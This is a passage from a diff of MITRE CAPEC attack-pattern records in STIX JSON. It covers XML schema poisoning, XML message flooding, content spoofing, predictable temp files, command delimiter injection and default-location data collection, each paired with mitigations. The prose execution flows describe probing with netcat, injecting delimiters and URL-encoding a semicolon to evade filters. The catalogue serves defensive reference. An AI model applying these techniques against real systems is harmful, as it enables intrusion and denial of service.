\n If the 'name' attribute is required in all submitted documents and this field is removed by the adversary, the application may enter an unexpected state or record incomplete data. Additionally, if this data is needed to perform additional functions, a Denial of Service (DOS) may occur.\n ", + "\n XML Schema Poisoning Attacks can also be executed remotely if the HTTP protocol is being used to transport data. :\n John Smith 555-1234 jsmith@email.com
1 Example Lane
\n The HTTP protocol does not encrypt the traffic it transports, so all communication occurs in plaintext. This traffic can be observed and modified by the adversary during transit to alter the XML schema before it reaches the end user. The adversary can perform a Adversary-in-the-Middle (CAPEC-94) Attack to alter the schema in the same way as the previous example and to acheive the same results.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine if XML schema is local or remote: Because this attack differs slightly if the target uses remote XML schemas versus local schemas, the adversary first needs to determine which of the two are used.

Experiment

  1. Gain access to XML schema: The adversary gains access to the XML schema so that they can modify the contents.

    2. Techniques
    For a local scenario, the adversary needs access to the machine that the schema is located on and needs to gain permissions to alter the contents of the file.
    For a remote scenario, the adversary needs to be able to sniff HTTP traffic that contains an XML schema.

Exploit

  1. Poison XML schema: Once the adversary gains access to the XML schema, they will alter it to achieve a desired effect. Locally, they can simply modify the file. For remote schemas, the adversary will alter the schema in transit by performing an adversary in the middle attack.

    2. Techniques
    Cause a denial of service by modifying the schema so that it does not contain required information for subsequent processing. For example, the unaltered schema may require a @name attribute in all submitted documents. If the adversary removes this attribute from the schema then documents created using the new grammar may lack this field, which may cause the processing application to enter an unexpected state or record incomplete data.
    Manipulation of the data types described in the schema may affect the results of calculations. For example, a float field could be changed to an int field.
    Change the encoding defined in the schema for certain fields allowing the contents to bypass filters that scan for dangerous strings. For example, the modified schema might use a URL encoding instead of ASCII, and a filter that catches a semicolon (;) might fail to detect its URL encoding (%3B).
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Some level of access to modify the target schema.", + "The schema used by the target application must be improperly secured against unauthorized modification and manipulation." + ], + "x_capec_resources_required": [ + "Access to the schema and the knowledge and ability modify it. Ability to replace or redirect access to the modified schema." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Protect the schema against unauthorized modification.", + "id": "course-of-action--c36e13c8-5f07-493b-9093-bc3656142e52", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-146-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa8c2087-a10b-40c8-aa4d-00be4324dda2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c36e13c8-5f07-493b-9093-bc3656142e52", + "target_ref": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: For applications that use a known schema, use a local copy or a known good repository instead of the schema reference supplied in the XML document. Additionally, ensure that the proper permissions are set on local files to avoid unauthorized modification.", + "id": "course-of-action--bdd2a92c-5b73-40d3-ad60-b046cf2aa3de", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-146-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8075cef3-6e2d-40ac-9e91-b9a4e17b5460", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bdd2a92c-5b73-40d3-ad60-b046cf2aa3de", + "target_ref": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: For applications that leverage remote schemas, use the HTTPS protocol to prevent modification of traffic in transit and to avoid unauthorized modification.", + "id": "course-of-action--64ccbe5a-017d-44f3-9f60-79e90c24af52", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-146-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03fec1aa-4921-455b-89f5-01af59405338", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64ccbe5a-017d-44f3-9f60-79e90c24af52", + "target_ref": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.", + "external_references": [ + { + "external_id": "CAPEC-147", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/147.html" + }, + { + "external_id": "CWE-400", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/400.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + } + ], + "id": "attack-pattern--94238840-08ad-4117-8a20-ed359cda1e7e", + "modified": "2018-07-31T00:00:00.000Z", + "name": "XML Ping of the Death", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (DoS: resource consumption (other))" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Consider the case of attack performed against the createCustomerBillingAccount Web Service for an online store. In this case, the createCustomerBillingAccount Web Service receives a huge number of simultaneous requests, containing nonsense billing account creation information (the small XML messages). The createCustomerBillingAccount Web Services may forward the messages to other Web Services for processing. The application suffers from a high load of requests, potentially leading to a complete loss of availability the involved Web Service." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an attacker records all instance of web services to process XML requests.

    2. Techniques
    Use an automated tool to record all instances of URLs to process XML requests.
    Use a browser to manually explore the website and analyze how the application processes XML requests.

Exploit

  1. Launch a resource depletion attack: The attacker delivers a large number of small XML messages to the target URLs found in the explore phase at a sufficiently rapid rate. It causes denial of service to the target application.

    2. Techniques
    Send a large number of crafted small XML messages to the target URL.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must receive and process XML transactions." + ], + "x_capec_resources_required": [ + "Transaction generator(s)/source(s) and ability to cause arrival of messages at the target with sufficient rapidity to overload target. Larger targets may be able to handle large volumes of requests so the attacker may require significant resources (such as a distributed network) to affect the target. However, the resources required of the attacker would be less than in the case of a simple flooding attack against the same target." + ], + "x_capec_skills_required": { + "High": "To use distributed network to launch the attack", + "Low": "To send small XML messages" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Build throttling mechanism into the resource allocation. Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval.", + "id": "course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-147-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cfd5f6e5-9782-45a5-9d8c-a1883c4b6d34", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd", + "target_ref": "attack-pattern--94238840-08ad-4117-8a20-ed359cda1e7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Provide for network flow control and traffic shaping to control access to the resources.", + "id": "course-of-action--ba0208fb-20e5-4c4f-9a93-d5d806d038e6", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-147-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2d06b870-3a8b-4f06-aa89-258fb7aec1e8", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0208fb-20e5-4c4f-9a93-d5d806d038e6", + "target_ref": "attack-pattern--94238840-08ad-4117-8a20-ed359cda1e7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary modifies content to make it contain something other than what the original content producer intended while keeping the apparent source of the content unchanged. The term content spoofing is most often used to describe modification of web pages hosted by a target to display the adversary's content instead of the owner's content. However, any content can be spoofed, including the content of email messages, file transfers, or the content of other network communication protocols. Content can be modified at the source (e.g. modifying the source file for a web page) or in transit (e.g. intercepting and modifying a message between the sender and recipient). Usually, the adversary will attempt to hide the fact that the content has been modified, but in some cases, such as with web site defacement, this is not necessary. Content Spoofing can lead to malware exposure, financial fraud (if the content governs financial transactions), privacy violations, and other unwanted outcomes.", + "external_references": [ + { + "external_id": "CAPEC-148", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/148.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "description": "Defacement", + "external_id": "T1491", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1491" + }, + { + "description": "Content Spoofing", + "external_id": "12", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Content-Spoofing" + }, + { + "description": "Content Spoofing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Content_Spoofing" + } + ], + "id": "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Content Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b", + "attack-pattern--cd6af290-f89e-4238-95b3-6f06d05ed814" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data (A successful content spoofing attack compromises the integrity of the application data.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--9d8a9dc3-5115-43c3-a5ec-8003e7b97b2e", + "attack-pattern--e7c0cce1-203e-454d-8a9a-76fa7ca120f8", + "attack-pattern--b2e8de4b-6757-4e7e-9c5c-210c44100577", + "attack-pattern--2e1be870-6442-4978-9a30-46d518aa1f74" + ], + "x_capec_prerequisites": [ + "The target must provide content but fail to adequately protect it against modification.The adversary must have the means to alter data to which they are not authorized. If the content is to be modified in transit, the adversary must be able to intercept the targeted messages." + ], + "x_capec_resources_required": [ + "\n If the content is to be modified in transit, the adversary requires a tool capable of intercepting the target's communication and generating/creating custom packets to impact the communications.\n In some variants, the targeted content is altered so that all or some of it is redirected towards content published by the attacker (for example, images and frames in the target's web site might be modified to be loaded from a source controlled by the attacker). In these cases, the attacker requires the necessary resources to host the replacement content.\n " + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker explores a target to identify the names and locations of predictable temporary files for the purpose of launching further attacks against the target. This involves analyzing naming conventions and storage locations of the temporary files created by a target application. If an attacker can predict the names of temporary files they can use this information to mount other attacks, such as information gathering and symlink attacks.", + "external_references": [ + { + "external_id": "CAPEC-149", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/149.html" + }, + { + "external_id": "CWE-377", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/377.html" + } + ], + "id": "attack-pattern--bddd2549-167f-4f7b-8d0f-6d1e647b26f6", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Explore for Predictable Temporary File Names", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--7fea6e82-183a-4811-9b71-1ebe4d6c8b11" + ], + "x_capec_child_of_refs": [ + "attack-pattern--323ed142-7793-413d-838f-72626caf58da" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted application must create names for temporary files using a predictable procedure, e.g. using sequentially increasing numbers.", + "The attacker must be able to see the names of the files the target is creating." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.", + "external_references": [ + { + "external_id": "CAPEC-15", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/15.html" + }, + { + "external_id": "CWE-146", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/146.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-185", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/185.html" + }, + { + "external_id": "CWE-93", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/93.html" + }, + { + "external_id": "CWE-140", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/140.html" + }, + { + "external_id": "CWE-157", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/157.html" + }, + { + "external_id": "CWE-138", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/138.html" + }, + { + "external_id": "CWE-154", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/154.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Command Delimiters", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n By appending special characters, such as a semicolon or other commands that are executed by the target process, the attacker is able to execute a wide variety of malicious commands in the target process space, utilizing the target's inherited permissions, against any resource the host has access to. The possibilities are vast including injection attacks against RDBMS (SQL Injection), directory servers (LDAP Injection), XML documents (XPath and XQuery Injection), and command line shells. In many injection attacks, the results are converted back to strings and displayed to the client process such as a web browser without tripping any security alarms, so the network firewall does not log any out of the ordinary behavior.\n LDAP servers house critical identity assets such as user, profile, password, and group information that is used to authenticate and authorize users. An attacker that can query the directory at will and execute custom commands against the directory server is literally working with the keys to the kingdom in many enterprises. When user, organizational units, and other directory objects are queried by building the query string directly from user input with no validation, or other conversion, then the attacker has the ability to use any LDAP commands to query, filter, list, and crawl against the LDAP server directly in the same manner as SQL injection gives the ability to the attacker to run SQL commands on the database.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Assess Target Runtime Environment: In situations where the runtime environment is not implicitly known, the attacker makes connections to the target system and tries to determine the system's runtime environment. Knowing the environment is vital to choosing the correct delimiters.

    2. Techniques
    Port mapping using network connection-based software (e.g., nmap, nessus, etc.)
    Port mapping by exploring the operating system (netstat, sockstat, etc.)
    TCP/IP Fingerprinting
    Induce errors to find informative error messages

  2. Survey the Application: The attacker surveys the target application, possibly as a valid and authenticated user

    3. Techniques
    Spidering web sites for all available links
    Inventory all application inputs

Experiment

  1. Attempt delimiters in inputs: The attacker systematically attempts variations of delimiters on known inputs, observing the application's response each time.

    2. Techniques
    Inject command delimiters using network packet injection tools (netcat, nemesis, etc.)
    Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.)
    Enter command delimiters directly in input fields.

Exploit

  1. Use malicious command delimiters: The attacker uses combinations of payload and carefully placed command delimiters to attack the software.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3" + ], + "x_capec_prerequisites": [ + "Software's input validation or filtering must not detect and block presence of additional malicious command." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP." + ], + "x_capec_skills_required": { + "Medium": "The attacker has to identify injection vector, identify the specific commands, and optionally collect the output, i.e. from an interactive session." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Perform allowlist validation against a positive specification for command length, type, and parameters.", + "id": "course-of-action--e5c4fb82-e889-429a-a343-f75a01e515dd", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-15-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5c4fb82-e889-429a-a343-f75a01e515dd", + "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Limit program privileges, so if commands circumvent program input validation or filter routines then commands do not running under a privileged account", + "id": "course-of-action--461e2128-8614-4665-acaa-4090f980504d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-15-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ab83c6e-5e54-4214-be2d-b4a9cb52405f", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--461e2128-8614-4665-acaa-4090f980504d", + "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform input validation for all remote content.", + "id": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-15-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--78b9961e-bbb1-4c40-9286-e4eedbba14bc", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use type conversions such as JDBC prepared statements.", + "id": "course-of-action--d27b9ab5-05c1-40d5-9fc3-cbcd2c723a00", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-15-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--18b1ee44-40f2-43f7-97d1-56bde0108bbd", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d27b9ab5-05c1-40d5-9fc3-cbcd2c723a00", + "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most systems, files and resources are organized in a default tree structure. This can be useful for adversaries because they often know where to look for resources or files that are necessary for attacks. Even when the precise location of a targeted resource may not be known, naming conventions may indicate a small area of the target machine's file tree where the resources are typically located. For example, configuration files are normally stored in the /etc director on Unix systems. Adversaries can take advantage of this to commit other types of attacks.", + "external_references": [ + { + "external_id": "CAPEC-150", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/150.html" + }, + { + "external_id": "CWE-552", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/552.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "external_id": "CWE-1323", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1323.html" + }, + { + "external_id": "CWE-1330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1330.html" + }, + { + "description": "OS Credential Dumping", + "external_id": "T1003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1003" + }, + { + "description": "Automated Collection", + "external_id": "T1119", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1119" + }, + { + "description": "Data from Information Repositories", + "external_id": "T1213", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1213" + }, + { + "description": "Data from Cloud Storage Object", + "external_id": "T1530", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1530" + }, + { + "description": "Credentials from Password Stores", + "external_id": "T1555", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1555" + }, + { + "description": "Data from Configuration Repository", + "external_id": "T1602", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1602" + } + ], + "id": "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Collect Data from Common Resource Locations", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary can use a technique called Bluesnarfing to retrieve data from Bluetooth enabled devices in which they know where the data is located. This is done by connecting to the device’s Object Exchange (OBEX) Push Profile and making OBEX GET requests for known filenames (contact lists, photos, recent calls). Bluesnarfing was patched shortly after its discovery in 2003 and will only work on devices created before or during this time." + ], + "x_capec_parent_of_refs": [ + "attack-pattern--a20a3cc9-4a6a-4376-a2b4-777ee9df2a34", + "attack-pattern--af65cbd9-cc10-4c4f-9cc3-843941cdf357", + "attack-pattern--7fea6e82-183a-4811-9b71-1ebe4d6c8b11", + "attack-pattern--756a1a93-3734-426c-9e91-f9339de74a7a", + "attack-pattern--60ceb889-a284-44bb-ae05-4b7e347e1597", + "attack-pattern--ad242ccf-3578-4787-937c-22eb0ede3fb6", + "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7" + ], + "x_capec_prerequisites": [ + "The targeted applications must either expect files to be located at a specific location or, if the location of the files can be configured by the user, the user either failed to move the files from the default location or placed them in a conventional location for files of the given type." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. In some cases, the attacker need not even have direct access to the locations on the target computer where the targeted resources reside." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials.", + "external_references": [ + { + "external_id": "CAPEC-151", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/151.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + } + ], + "id": 